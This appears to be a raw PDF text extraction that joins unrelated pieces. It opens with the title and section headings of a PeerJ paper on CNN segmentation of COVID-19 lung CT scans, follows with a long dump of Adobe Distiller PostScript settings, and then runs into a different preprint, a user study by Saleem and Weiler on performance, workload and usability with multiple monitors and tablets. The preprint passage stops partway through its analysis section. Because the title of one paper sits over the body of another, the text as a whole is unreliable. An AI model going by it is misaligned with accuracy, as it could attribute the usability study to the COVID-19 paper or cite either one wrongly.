https://www.who.int/dg/speeches/detail/who-director-general-s-remarks-at-the-media-briefing-on-2019-ncov-on-11-february-2020 https://www.who.int/dg/speeches/detail/who-director-general-s-remarks-at-the-media-briefing-on-2019-ncov-on-11-february-2020 http://dx.doi.org/10.1056/NEJMoa2001017 http://dx.doi.org/10.1148/radiol.2020200490 http://dx.doi.org/10.7717/peerj-cs.368 https://peerj.com/computer-science/ Performance analysis of lightweight CNN models to segment infectious lung tissues of COVID-19 cases from tomographic images Introduction Materials and Methods Results and Discussion Conclusion flink5 References << /ASCII85EncodePages false /AllowTransparency false /AutoPositionEPSFiles true /AutoRotatePages /None /Binding /Left /CalGrayProfile (Dot Gain 20%) /CalRGBProfile (sRGB IEC61966-2.1) /CalCMYKProfile (U.S. Web Coated \050SWOP\051 v2) /sRGBProfile (sRGB IEC61966-2.1) /CannotEmbedFontPolicy /Warning /CompatibilityLevel 1.4 /CompressObjects /Off /CompressPages true /ConvertImagesToIndexed true /PassThroughJPEGImages true /CreateJobTicket false /DefaultRenderingIntent /Default /DetectBlends true /DetectCurves 0.0000 /ColorConversionStrategy /LeaveColorUnchanged /DoThumbnails false /EmbedAllFonts true /EmbedOpenType false /ParseICCProfilesInComments true /EmbedJobOptions true /DSCReportingLevel 0 /EmitDSCWarnings false /EndPage -1 /ImageMemory 1048576 /LockDistillerParams false /MaxSubsetPct 100 /Optimize true /OPM 1 /ParseDSCComments true /ParseDSCCommentsForDocInfo true /PreserveCopyPage true /PreserveDICMYKValues true /PreserveEPSInfo true /PreserveFlatness true /PreserveHalftoneInfo false /PreserveOPIComments false /PreserveOverprintSettings true /StartPage 1 /SubsetFonts true /TransferFunctionInfo /Apply /UCRandBGInfo /Preserve /UsePrologue false /ColorSettingsFile (None) /AlwaysEmbed [ true ] /NeverEmbed [ true ] /AntiAliasColorImages false /CropColorImages true /ColorImageMinResolution 300 /ColorImageMinResolutionPolicy /OK /DownsampleColorImages false /ColorImageDownsampleType /Average /ColorImageResolution 300 /ColorImageDepth 8 /ColorImageMinDownsampleDepth 1 /ColorImageDownsampleThreshold 1.50000 /EncodeColorImages true /ColorImageFilter /FlateEncode /AutoFilterColorImages false /ColorImageAutoFilterStrategy /JPEG /ColorACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /ColorImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000ColorACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000ColorImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasGrayImages false /CropGrayImages true /GrayImageMinResolution 300 /GrayImageMinResolutionPolicy /OK /DownsampleGrayImages false /GrayImageDownsampleType /Average /GrayImageResolution 300 /GrayImageDepth 8 /GrayImageMinDownsampleDepth 2 /GrayImageDownsampleThreshold 1.50000 /EncodeGrayImages true /GrayImageFilter /FlateEncode /AutoFilterGrayImages false /GrayImageAutoFilterStrategy /JPEG /GrayACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /GrayImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000GrayACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000GrayImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasMonoImages false /CropMonoImages true /MonoImageMinResolution 1200 /MonoImageMinResolutionPolicy /OK /DownsampleMonoImages false /MonoImageDownsampleType /Average /MonoImageResolution 1200 /MonoImageDepth -1 /MonoImageDownsampleThreshold 1.50000 /EncodeMonoImages true /MonoImageFilter /CCITTFaxEncode /MonoImageDict << /K -1 >> /AllowPSXObjects false /CheckCompliance [ /None ] /PDFX1aCheck false /PDFX3Check false /PDFXCompliantPDFOnly false /PDFXNoTrimBoxError true /PDFXTrimBoxToMediaBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXSetBleedBoxToMediaBox true /PDFXBleedBoxToTrimBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXOutputIntentProfile (None) /PDFXOutputConditionIdentifier () /PDFXOutputCondition () /PDFXRegistryName () /PDFXTrapped /False /CreateJDFFile false /Description << /CHS <FEFF4f7f75288fd94e9b8bbe5b9a521b5efa7684002000500044004600206587686353ef901a8fc7684c976262535370673a548c002000700072006f006f00660065007200208fdb884c9ad88d2891cf62535370300260a853ef4ee54f7f75280020004100630072006f0062006100740020548c002000410064006f00620065002000520065006100640065007200200035002e003000204ee553ca66f49ad87248672c676562535f00521b5efa768400200050004400460020658768633002> /CHT <FEFF4f7f752890194e9b8a2d7f6e5efa7acb7684002000410064006f006200650020005000440046002065874ef653ef5728684c9762537088686a5f548c002000700072006f006f00660065007200204e0a73725f979ad854c18cea7684521753706548679c300260a853ef4ee54f7f75280020004100630072006f0062006100740020548c002000410064006f00620065002000520065006100640065007200200035002e003000204ee553ca66f49ad87248672c4f86958b555f5df25efa7acb76840020005000440046002065874ef63002> /DAN <FEFF004200720075006700200069006e0064007300740069006c006c0069006e006700650072006e0065002000740069006c0020006100740020006f007000720065007400740065002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e007400650072002000740069006c0020006b00760061006c00690074006500740073007500640073006b007200690076006e0069006e006700200065006c006c006500720020006b006f007200720065006b007400750072006c00e60073006e0069006e0067002e0020004400650020006f007000720065007400740065006400650020005000440046002d0064006f006b0075006d0065006e0074006500720020006b0061006e002000e50062006e00650073002000690020004100630072006f00620061007400200065006c006c006500720020004100630072006f006200610074002000520065006100640065007200200035002e00300020006f00670020006e0079006500720065002e> /DEU <FEFF00560065007200770065006e00640065006e0020005300690065002000640069006500730065002000450069006e007300740065006c006c0075006e00670065006e0020007a0075006d002000450072007300740065006c006c0065006e00200076006f006e002000410064006f006200650020005000440046002d0044006f006b0075006d0065006e00740065006e002c00200076006f006e002000640065006e0065006e002000530069006500200068006f00630068007700650072007400690067006500200044007200750063006b006500200061007500660020004400650073006b0074006f0070002d0044007200750063006b00650072006e00200075006e0064002000500072006f006f0066002d00470065007200e400740065006e002000650072007a0065007500670065006e0020006d00f60063006800740065006e002e002000450072007300740065006c006c007400650020005000440046002d0044006f006b0075006d0065006e007400650020006b00f6006e006e0065006e0020006d006900740020004100630072006f00620061007400200075006e0064002000410064006f00620065002000520065006100640065007200200035002e00300020006f0064006500720020006800f600680065007200200067006500f600660066006e00650074002000770065007200640065006e002e> /ESP <FEFF005500740069006c0069006300650020006500730074006100200063006f006e0066006900670075007200610063006900f3006e0020007000610072006100200063007200650061007200200064006f00630075006d0065006e0074006f0073002000640065002000410064006f0062006500200050004400460020007000610072006100200063006f006e00730065006700750069007200200069006d0070007200650073006900f3006e002000640065002000630061006c006900640061006400200065006e00200069006d0070007200650073006f0072006100730020006400650020006500730063007200690074006f00720069006f00200079002000680065007200720061006d00690065006e00740061007300200064006500200063006f00720072006500630063006900f3006e002e002000530065002000700075006500640065006e00200061006200720069007200200064006f00630075006d0065006e0074006f00730020005000440046002000630072006500610064006f007300200063006f006e0020004100630072006f006200610074002c002000410064006f00620065002000520065006100640065007200200035002e003000200079002000760065007200730069006f006e0065007300200070006f00730074006500720069006f007200650073002e> /FRA <FEFF005500740069006c006900730065007a00200063006500730020006f007000740069006f006e00730020006100660069006e00200064006500200063007200e900650072002000640065007300200064006f00630075006d0065006e00740073002000410064006f00620065002000500044004600200070006f007500720020006400650073002000e90070007200650075007600650073002000650074002000640065007300200069006d007000720065007300730069006f006e00730020006400650020006800610075007400650020007100750061006c0069007400e90020007300750072002000640065007300200069006d007000720069006d0061006e0074006500730020006400650020006200750072006500610075002e0020004c0065007300200064006f00630075006d0065006e00740073002000500044004600200063007200e900e90073002000700065007500760065006e0074002000ea0074007200650020006f007500760065007200740073002000640061006e00730020004100630072006f006200610074002c002000610069006e00730069002000710075002700410064006f00620065002000520065006100640065007200200035002e0030002000650074002000760065007200730069006f006e007300200075006c007400e90072006900650075007200650073002e> /ITA <FEFF005500740069006c0069007a007a006100720065002000710075006500730074006500200069006d0070006f007300740061007a0069006f006e00690020007000650072002000630072006500610072006500200064006f00630075006d0065006e00740069002000410064006f006200650020005000440046002000700065007200200075006e00610020007300740061006d007000610020006400690020007100750061006c0069007400e00020007300750020007300740061006d00700061006e0074006900200065002000700072006f006f0066006500720020006400650073006b0074006f0070002e0020004900200064006f00630075006d0065006e007400690020005000440046002000630072006500610074006900200070006f00730073006f006e006f0020006500730073006500720065002000610070006500720074006900200063006f006e0020004100630072006f00620061007400200065002000410064006f00620065002000520065006100640065007200200035002e003000200065002000760065007200730069006f006e006900200073007500630063006500730073006900760065002e> /JPN <FEFF9ad854c18cea51fa529b7528002000410064006f0062006500200050004400460020658766f8306e4f5c6210306b4f7f75283057307e30593002537052376642306e753b8cea3092670059279650306b4fdd306430533068304c3067304d307e3059300230c730b930af30c830c330d730d730ea30f330bf3067306e53705237307e305f306f30d730eb30fc30d57528306b9069305730663044307e305930023053306e8a2d5b9a30674f5c62103055308c305f0020005000440046002030d530a130a430eb306f3001004100630072006f0062006100740020304a30883073002000410064006f00620065002000520065006100640065007200200035002e003000204ee5964d3067958b304f30533068304c3067304d307e30593002> /KOR <FEFFc7740020c124c815c7440020c0acc6a9d558c5ec0020b370c2a4d06cd0d10020d504b9b0d1300020bc0f0020ad50c815ae30c5d0c11c0020ace0d488c9c8b85c0020c778c1c4d560002000410064006f0062006500200050004400460020bb38c11cb97c0020c791c131d569b2c8b2e4002e0020c774b807ac8c0020c791c131b41c00200050004400460020bb38c11cb2940020004100630072006f0062006100740020bc0f002000410064006f00620065002000520065006100640065007200200035002e00300020c774c0c1c5d0c11c0020c5f40020c2180020c788c2b5b2c8b2e4002e> /NLD (Gebruik deze instellingen om Adobe PDF-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. De gemaakte PDF-documenten kunnen worden geopend met Acrobat en Adobe Reader 5.0 en hoger.) /NOR <FEFF004200720075006b00200064006900730073006500200069006e006e007300740069006c006c0069006e00670065006e0065002000740069006c002000e50020006f0070007000720065007400740065002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e00740065007200200066006f00720020007500740073006b00720069006600740020006100760020006800f800790020006b00760061006c00690074006500740020007000e500200062006f007200640073006b0072006900760065007200200065006c006c00650072002000700072006f006f006600650072002e0020005000440046002d0064006f006b0075006d0065006e00740065006e00650020006b0061006e002000e50070006e00650073002000690020004100630072006f00620061007400200065006c006c00650072002000410064006f00620065002000520065006100640065007200200035002e003000200065006c006c00650072002000730065006e006500720065002e> /PTB <FEFF005500740069006c0069007a006500200065007300730061007300200063006f006e00660069006700750072006100e700f50065007300200064006500200066006f0072006d00610020006100200063007200690061007200200064006f00630075006d0065006e0074006f0073002000410064006f0062006500200050004400460020007000610072006100200069006d0070007200650073007300f5006500730020006400650020007100750061006c0069006400610064006500200065006d00200069006d00700072006500730073006f0072006100730020006400650073006b0074006f00700020006500200064006900730070006f00730069007400690076006f0073002000640065002000700072006f00760061002e0020004f007300200064006f00630075006d0065006e0074006f00730020005000440046002000630072006900610064006f007300200070006f00640065006d0020007300650072002000610062006500720074006f007300200063006f006d0020006f0020004100630072006f006200610074002000650020006f002000410064006f00620065002000520065006100640065007200200035002e0030002000650020007600650072007300f50065007300200070006f00730074006500720069006f007200650073002e> /SUO <FEFF004b00e40079007400e40020006e00e40069007400e4002000610073006500740075006b007300690061002c0020006b0075006e0020006c0075006f0074002000410064006f0062006500200050004400460020002d0064006f006b0075006d0065006e007400740065006a00610020006c0061006100640075006b006100730074006100200074007900f6007000f60079007400e400740075006c006f0073007400750073007400610020006a00610020007600650064006f007300740075007300740061002000760061007200740065006e002e00200020004c0075006f0064007500740020005000440046002d0064006f006b0075006d0065006e00740069007400200076006f0069006400610061006e0020006100760061007400610020004100630072006f0062006100740069006c006c00610020006a0061002000410064006f00620065002000520065006100640065007200200035002e0030003a006c006c00610020006a006100200075007500640065006d006d0069006c006c0061002e> /SVE <FEFF0041006e007600e4006e00640020006400650020006800e4007200200069006e0073007400e4006c006c006e0069006e006700610072006e00610020006f006d002000640075002000760069006c006c00200073006b006100700061002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e00740020006600f600720020006b00760061006c00690074006500740073007500740073006b0072006900660074006500720020007000e5002000760061006e006c00690067006100200073006b0072006900760061007200650020006f006300680020006600f600720020006b006f007200720065006b007400750072002e002000200053006b006100700061006400650020005000440046002d0064006f006b0075006d0065006e00740020006b0061006e002000f600700070006e00610073002000690020004100630072006f0062006100740020006f00630068002000410064006f00620065002000520065006100640065007200200035002e00300020006f00630068002000730065006e006100720065002e> /ENU (Use these settings to create Adobe PDF documents for quality printing on desktop printers and proofers. Created PDF documents can be opened with Acrobat and Adobe Reader 5.0 and later.) >> /Namespace [ (Adobe) (Common) (1.0) ] /OtherNamespaces [ << /AsReaderSpreads false /CropImagesToFrames true /ErrorControl /WarnAndContinue /FlattenerIgnoreSpreadOverrides false /IncludeGuidesGrids false /IncludeNonPrinting false /IncludeSlug false /Namespace [ (Adobe) (InDesign) (4.0) ] /OmitPlacedBitmaps false /OmitPlacedEPS false /OmitPlacedPDF false /SimulateOverprint /Legacy >> << /AddBleedMarks false /AddColorBars false /AddCropMarks false /AddPageInfo false /AddRegMarks false /ConvertColors /NoConversion /DestinationProfileName () /DestinationProfileSelector /NA /Downsample16BitImages true /FlattenerPreset << /PresetSelector /MediumResolution >> /FormElements false /GenerateStructure true /IncludeBookmarks false /IncludeHyperlinks false /IncludeInteractive false /IncludeLayers false /IncludeProfiles true /MultimediaHandling /UseObjectSettings /Namespace [ (Adobe) (CreativeSuite) (2.0) ] /PDFXOutputIntentProfileSelector /NA /PreserveEditing true /UntaggedCMYKHandling /LeaveUntagged /UntaggedRGBHandling /LeaveUntagged /UseDocumentBleed false >> ] >> setdistillerparams << /HWResolution [2400 2400] /PageSize [612.000 792.000] >> setpagedevice work_zaoccjidqrghfmkriplbpj6m3a ---- Performance, workload, and usability in a multiscreen, multi-device, information-rich environment A peer-reviewed version of this preprint was published in PeerJ on 10 September 2018. View the peer-reviewed version (peerj.com/articles/cs-162), which is the preferred citable publication unless you specifically need to cite this preprint. Saleem JJ, Weiler DT. 2018. Performance, workload, and usability in a multiscreen, multi-device, information-rich environment. PeerJ Computer Science 4:e162 https://doi.org/10.7717/peerj-cs.162 https://doi.org/10.7717/peerj-cs.162 https://doi.org/10.7717/peerj-cs.162 Performance, workload, and usability in a multiscreen, multi- device, information-rich environment Jason J Saleem Corresp., 1, 2 , Dustin T Weiler 1, 3 1 Department of Industrial Engineering, University of Louisville, Louisville, Kentucky, United States 2 Center for Ergonomics, University of Louisville, Louisville, Kentucky, United States 3 Department of Industrial and Systems Engineering, University of Wisconsin-Madison, Madison, Wisconsin, United States Corresponding Author: Jason J Saleem Email address: jason.saleem@louisville.edu Potential benefits of multiscreen and multiple device environments were assessed using three different computing environments. A single factor, within-subject study was conducted with 18 engineering students in a laboratory experiment. Three levels for the computing environment factor included one with a desktop computer with a single monitor (control, condition A); one with a desktop with dual monitors, as well as a single tablet computer (condition B); and one with a desktop with a single monitor, as well as two tablet computers (condition C). There was no statistically significant difference in efficiency or workload when completing scenarios for the three computing environments. However, a dual monitor desktop with a single tablet computer (B) was the ideal computing environment for the information-rich engineering problem given to participants, supported by significantly fewer errors compared to condition C and significantly higher usability ratings compared to conditions A and C. A single desktop monitor with two tablet computers (C) did not provide any advantage compared to a single desktop monitor (A). PeerJ Preprints | https://doi.org/10.7287/peerj.preprints.26826v1 | CC BY 4.0 Open Access | rec: 4 Apr 2018, publ: 4 Apr 2018 1 Performance, Workload, and Usability in a Multiscreen, Multi-device, Information-rich 2 Environment 3 4 Jason J. Saleem1,2 * and Dustin T. Weiler1,3 5 6 1Department of Industrial Engineering, J.B. Speed School of Engineering, University of 7 Louisville, Louisville, Kentucky, USA 8 2Center for Ergonomics, University of Louisville, Louisville, KY, USA 9 3Department of Industrial and Systems Engineering, University of Wisconsin-Madison, Madison, 10 Wisconsin, USA 11 12 13 Corresponding Author: 14 Jason J. Saleem, PhD, Department of Industrial Engineering, J.B. Speed School of Engineering, 15 University of Louisville, Louisville, KY, USA, 40292, Tel: + 1 502 852 2274, Fax: + 1 502 852 16 5633, Email: jason.saleem@louisville.edu 17 18 19 20 21 22 23 mailto:jason.saleem@louisville.edu 24 Abstract 25 Potential benefits of multiscreen and multiple device environments were assessed using 26 three different computing environments. A single factor, within-subject study was conducted 27 with 18 engineering students in a laboratory experiment. Three levels for the computing 28 environment factor included one with a desktop computer with a single monitor (control, 29 condition A); one with a desktop with dual monitors, as well as a single tablet computer 30 (condition B); and one with a desktop with a single monitor, as well as two tablet computers 31 (condition C). There was no statistically significant difference in efficiency or workload when 32 completing scenarios for the three computing environments. However, a dual monitor desktop 33 with a single tablet computer (B) was the ideal computing environment for the information-rich 34 engineering problem given to participants, supported by significantly fewer errors compared to 35 condition C and significantly higher usability ratings compared to conditions A and C. A single 36 desktop monitor with two tablet computers (C) did not provide any advantage compared to a 37 single desktop monitor (A). 38 39 40 41 42 43 44 45 46 47 1. Introduction 48 As having more than one computing device and/or monitors is becoming more feasible 49 for individuals, a future trend is the of adoption of a multiscreen and multiple device approach to 50 cope with distractions and multiple tasks. Although this may seem counterintuitive, more 51 screens and possibly more devices may help focus one’s attention rather than serve as a 52 distraction, making multiple tasks viewable at a glance across multiple device screens 53 (Thompson, 2014). Assuming each device has a different primary purpose, the additional 54 screens may begin to approximate some of the inherent affordances of paper. That is, spreading 55 out papers on a desk lets one’s eyes easily scan, which is a property hard to replicate on a single 56 computer screen. Thus, coordination of multiple computing devices and screens is a strategy that 57 may potentially improve one’s performance in an information-rich environment by focusing their 58 attention and reducing their mental workload. Combining multiple screens and information 59 devices has recently been studied qualitatively, in the field (Jokela, Ojala, & Olsson, 2015). 60 However, little quantitative experimentation has been done as to how a multi-device setup might 61 affect task performance, which is the main objective of this study. 62 The study described in this paper is a natural evolution of a previous study that involved 63 paper-based workarounds to using the electronic health record (EHR) (Saleem et al., 2009). In 64 this study, we found that paper served as an important tool and assisted healthcare employees in 65 their work. In other cases, paper use circumvented the intended EHR design, introduced potential 66 gaps in documentation, and generated possible paths to medical error. Investigating these paper 67 processes helped us understand how the current exam room computing and EHR were not 68 meeting the needs of the clinicians. The “forgotten” power of paper, including its ability to serve 69 as a reliable cognitive memory aid and to help focus attention on important information, were 70 lost as EHRs began to take shape. Today, a multiscreen and multiple device work environment 71 is becoming a trend. How to optimize the use and coordination of these multiple screens and 72 devices is not known. This type of environment may help simulate the forgotten power of paper 73 by replicating many of the lost affordances of paper-based processes, such as easy visual 74 attention switches across screens, as well as the display of the most important information, 75 separated by function or purpose across screens and devices. The objective of our study was to 76 understand how to optimize this type of multiscreen and multiple device environment for 77 improved user performance and satisfaction, and reduced mental workload. 78 There exists a large body of human-computer interaction (HCI) literature on the use of 79 multiple screens, screen sizes, and form factors (e.g., desktop, tablet, smartphone). Previous 80 studies in academic (Anderson, Colvin, Tobler, & Lindsay, 2004; Russell & Wong, 2005) and 81 hospital (Poder, Godbout, & Bellemare, 2011) settings have demonstrated that performance is 82 improved with the use of two monitors compared to one. For example, participants were quicker 83 on tasks, did the work faster, and performed more work with fewer errors in multiscreen (dual 84 screen) configurations than with a single screen (Anderson et al., 2004). Another study 85 demonstrated that users do not tend to treat a second monitor as additional space. That is, 86 participants reported rarely straddling a single window across two monitors. This is consistent 87 with the physical gaps that are often left between monitors. Instead, users typically maximize a 88 design to fill one monitor entirely, leaving the other monitor free for other uses (Grudin, 2001). 89 The visual and physical separation between displays requires that users perform visual attention 90 switches between displays (Rashid, Nacenta, & Quigley, 2012). In one study, the authors 91 utilized a divided attention paradigm to explore the effects of visual separation and physical 92 discontinuities when distributing information across multiple displays. Results showed reliable 93 detrimental effects (about a 10% performance decrement) when information is separated within 94 the visual field, but only when coupled with an offset in depth (Tan & Czerwinski, 2003). 95 The optimal monitor size and position has also been studied. One study compared 15-, 96 17-, 19-, and 21-inch monitors and found that while participants’ performance was most efficient 97 with the 21-inch monitor for Excel and Word tasks, users significantly preferred the 19-inch 98 monitor (Simmons, 2001). The majority (65%) of participants noted that the 21-inch monitor 99 was too large or bulky for the average workspace (Simmons & Manahan, 1999; Simmons, 2001). 100 A limitation of this study was that screen resolution was not controlled for across the four screen 101 sizes. Although there has also been experimentation with very large displays (e.g., 42-inch 102 monitor), there are several usability issues that are barriers to adopting larger displays, including: 103 losing track of the cursor, distal access to information, window management problems (e.g., 104 windows pop up in unexpected places), task management problems, configuration problems, and 105 failure to leverage the periphery (Czerwinski et al., 2006). Therefore, separate smaller displays 106 (e.g., 19-inch) seems to be advantageous as compared to a single, very large display. In terms of 107 user-preferred position of computer monitors, one study found that participants placed larger 108 displays farther and lower while maintaining the display top at or near eye height (Shin & 109 Hegde, 2010). Preferred position of the dual displays in landscape arrangement did not differ 110 from that of a single display. Therefore, it appears that the preferred display position varies with 111 the vertical dimension of the overall viewable area of the display (Shin & Hegde, 2010). 112 In addition to multiple monitors, handheld computers such as tablets and smartphones are 113 becoming much more accessible in the workplace. For example, in clinical care settings, one 114 research team noted that by making the most useful and appropriate data available on multiple 115 devices and by facilitating the visual attention switching between those devices, staff members 116 can efficiently integrate them in their workflow, allowing for faster and more accurate decisions 117 (De Backere F. et al., 2015). Research on the performance differences with the form factor of 118 handheld computers revealed a significant difference in completion times between the tablet and 119 smart phone screen sizes (17.8 vs. 7.1 cm), but no differences in errors or subjectively assessed 120 cognitive workload (Byrd & Caldwell, 2011). These previous studies were useful for 121 understanding how to blend a multiple monitor environment with additional devices, such as 122 tablet computers, for creating multiscreen environments to compare in our study. 123 124 2. Methods 125 2.1 Study Design 126 This research was approved by the Institutional Review Board (IRB) at the University of 127 Louisville (IRB # 16.0025). Informed consent was obtained from each participant. The study 128 was conducted in the Center for Ergonomics lab space at the University of Louisville to test the 129 three different computing work areas with 18 engineering students. We used a counterbalanced, 130 within-subject design, with ‘Computing Environment’ as the single independent variable. The 131 three levels of Computing Environment are shown in Figure 1. The presentation order of the 132 three work area computing conditions were counterbalanced across the 18 participants to control 133 for a potential carry over learning effect. Condition A had a single desktop computer with a 19- 134 inch monitor (baseline condition). Condition B had a desktop with dual 19-inch monitors, as 135 well as a single tablet computer with a 9.7-inch display. Condition C had a desktop with a 19- 136 inch monitor, as well as two tablet computers, with 9.7 inch displays. The 19-inch monitors 137 were in fixed positions; however, the tablet computers were not fixed or propped up and could be 138 moved based on users’ preferences. A standard keyboard and mouse were used as the input 139 devices for the monitors. The desktop had a Windows 7 operating system and the tablets were 140 iPad Air 2’s with the iOS 10 operating system. The input for the iPads were via touch screen and 141 electronic keyboard (no external input devices were connected to the iPads). The same 142 resolution (1920 x 1080 pixels) for the 19-inch monitors was used for each condition. The 143 resolution of the iPads was 1536 x 2048 pixels. These three conditions were chosen based on a 144 review of the literature to begin to understand how a multiscreen work area may affect 145 performance and satisfaction in an information-rich environment. 146 ---------------------------------------------- 147 Insert Figure 1 about here 148 ---------------------------------------------- 149 A previous study found that a 19-inch monitor is the optimal screen size based on 150 performance and preference (Simmons & Manahan, 1999; Simmons, 2001). Therefore, a single 151 19-inch monitor work area served as a baseline condition (A) for comparison with the 152 multiscreen conditions. Several studies have found increased performance for dual-screen users 153 (Anderson et al., 2004; Poder et al., 2011; Russell & Wong, 2005); a dual screen set up is part of 154 condition (B). The dual-screens were fixed on the horizontal plane from the user’s perspective 155 since varying screen position by depth was found to result in a performance decrement (Tan & 156 Czerwinski, 2003). Although pervious research supports the use of dual-screen monitors, it is 157 not known how performance and satisfaction is impacted with the availability of additional 158 screens from the use of mobile technologies. Tablet computers were introduced in conditions 159 (B) and (C) rather than other form factors such as smart phones since previous research 160 demonstrated a significant difference in task completion times between the tablet and smart 161 phone screen sizes (Byrd & Caldwell, 2011). One tablet computer was introduced in condition 162 (B) to use in conjunction with the dual monitor desktop and two tablets computers were 163 introduced in condition (C) to use on conjunction with a single monitor desktop. Conditions (B) 164 and (C) incorporated multiple screens across multiple form factors (desktop monitor and tablet 165 computer) to understand the if multiple screens can help focus (or distract) users’ attention in an 166 information-rich environment (Thompson, 2014). 167 2.2 Participants 168 For this study, 18 industrial engineering students (11 males, 7 females) participated 169 between March-June 2016. Industrial engineering students were chosen based on the flow- 170 charting tasks involved in the session; all students, except for one, had previously learned how to 171 use a process flow chart from an undergraduate course on work design. The one exception was a 172 graduate student with a mathematics undergraduate background. However, she was given an 173 overview of process flow charting technique prior to data collection. Participants were between 174 the ages of 19 and 26 years old; the median age was 23. All participants, with the exception of 175 one, reported little or no previous knowledge of race car driving, which was the application area 176 for the experimental tasks. One participant had a great deal of knowledge about race car driving. 177 Ten of the participants currently used a dual-monitor set-up for their personal workstations and 178 all but one participant had experience using tablet computers or ‘2 in 1’ computers (tablets that 179 convert to a laptop). Only one participant reported regularly using an iPad, which were the 180 tablets used as part of this study. 181 2.3 Dependent Measures 182 We used performance (efficiency and accuracy), workload, and usability as measures to 183 demonstrate improved work area computing. Specifically, improved efficiency and accuracy 184 using a certain work area computing condition (A, B, or C), or time to complete tasks and 185 reduction of errors, would suggest that the work area computing set-up better supports the users’ 186 ability to efficiently and effectively complete information-rich tasks. Similarly, through 187 improved work area computing set-up, a decrease in mental workload (and thus required 188 attentional resources) was predicted, as measured by the NASA Task Load Index (TLX) (Hart & 189 Staveland, 1998). We used unweighted TLX scores as the TLX dimensional weighting 190 procedure has been found to be of limited benefit (Hendy, Hamilton, & Landry, 1993; Nygren, 191 1991). Finally, an improved work area computing set-up would be expected to score higher on a 192 validated usability survey; we used the Computer Usability Satisfaction Questionnaire (CSUQ) 193 (Lewis, 1995). Each of these measures was used to compare the three experimental conditions 194 for work area computing. 195 2.4 Scenarios and Tasks 196 Participants were asked to use flow process charts to document the steps that members of 197 a National Association for Stock Car Auto Racing (NASCAR) team perform during a pit stop. 198 Participants documented different members of the pit crew for each of the three work area 199 computing conditions A, B, and C. The multiscreen/device conditions B and C can be described 200 as “related parallel use” conditions (Jokela et al., 2015), where participants work on completing a 201 single task using more than one device in parallel. The three members of the pit crew for this 202 experiment were front tire carrier, rear tire carrier, and jack man. Participants first watched a 203 demonstration / tutorial video that showed the roles of each member of the pit crew (Interstate 204 Batteries, 2012). After this orientation, participants experienced each work area computing 205 condition while completing a flow process chart to document a different pit crew member’s tasks 206 while watching an actual pit stop video (ArmyRanger241 [screen name], 2015). Solutions for 207 the flow process charts for each of the three roles were developed by one of the authors 208 (D.T.W.), who possessed extensive knowledge of NASCAR racing, prior to the first participant 209 (Appendices A-C). We chose this particular pit stop scenario as an example of an information- 210 rich task, where the use of multiple screens was potentially useful. Table 1 shows how the 211 information was partitioned across the screens and devices for each condition. 212 ---------------------------------------------- 213 Insert Table 1 about here 214 ---------------------------------------------- 215 2.5 Experimental Space 216 The laboratory in the Center for Ergonomics consisted of a participant room (134 sq. ft.) 217 within a larger, main laboratory space (848 sq. ft.). The participant room and main laboratory 218 space were connected with a door and a one-way mirror. The experimenter’s station was located 219 just outside of the participant room. Morae usability testing software connected the participant’s 220 computer and experiment’s computer and was used to display the tasks and instructions to the 221 participant. Morae was also used to video record the direct screen capture of the participant’s 222 interaction with the two desktop monitors. A Web cam was used to record the participant’s 223 interaction with the iPads, and was synced with the Morae screen capture recording. Time to 224 complete the scenarios was automatically captured by Morae. 225 2.6 Procedure 226 After completing a demographics form, participants were given a brief verbal overview 227 of the purpose of the experiment and then oriented to the experimental space. After watching the 228 pit stop demonstration (tutorial) video, participants completed a flow process chart for a member 229 of the pit crew with the work area computing conditions A, B, and C, (counterbalanced across 230 participants) with the information available to them listed in Table 1. Documents and 231 information needed to complete this task, including a blank flow process chart, were provided to 232 the participant by the experimenter though email. After accessing these information items 233 through email, participants could display them as they wished (split screen or toggle between 234 windows to view one at a time) as long as the information items were partitioned across the 235 monitors and devices as prescribed in Table 1. For all three conditions, the flow process chart 236 was always located on Monitor 1 as completing the chart was the primary activity. All other 237 information sources in Table 1 were supportive of completing the flow process chart. A 238 dimension sheet of the pit stop area was provided so that participants could estimate distance for 239 travel steps in the flow process chart. 240 Each of three pit crew roles (tire carrier, rear tire carrier, and jack man) were randomly 241 assigned to the three conditions for each participant. After completing the scenarios for a given 242 condition, participants were given the NASA TLX (computerized version) and CSUQ (paper- 243 based version) surveys for mental workload and usability, respectively. Thus participants 244 completed each survey a total of three times, one for each work area computing condition A, B, 245 and C. After completing the final condition, the debrief session commenced, with the 246 experimenter conducting a semi-structure interview to explore each participant’s experiences 247 with each condition (Appendix D). The debrief interview was audio recorded by Morae. 248 Participants received a $30 gift card at the completion of the debrief session as compensation for 249 their time. The entire participation time was scheduled for 1.5 hours for each volunteer. 250 2.7 Hypotheses 251 Based on a review of the literature supporting the use of multiscreen and multi-device 252 computing to improve performance in information-rich environments, as well as the possibility 253 that multiple screens may help focus one’s attention when the information and functions are 254 parsed distinctly across each screen, the following was predicted: 255 Hypothesis 1: Participants will perform the scenarios in significantly less time and with 256 significantly fewer errors with conditions B and C as compared to condition A (Figure 1). 257 Hypothesis 2: Participants will experience significantly less mental workload when completing 258 the scenarios with conditions B and C as compared to condition A. 259 Hypothesis 3: Participants will rate the usability of the work area computing set-up in conditions 260 B and C significantly higher as compared to condition A. 261 Hypothesis 4: There will be no significant differences for any of the dependent variables between 262 condition B and condition C. 263 2.8 Analysis 264 The simulation study followed a single factor, within-subject experimental design. The 265 single factor was ‘Computing Environment’, with three levels (A, B, C), depicted in Figure 1. 266 Analysis of variance (ANOVA) was planned to test for a main effect of ‘Computing 267 Environment’ on each dependent outcome measures. We planned to use non-parametric 268 statistical testing (i.e., Friedman Two-Way ANOVA) if the normality assumption of ANOVA 269 was violated 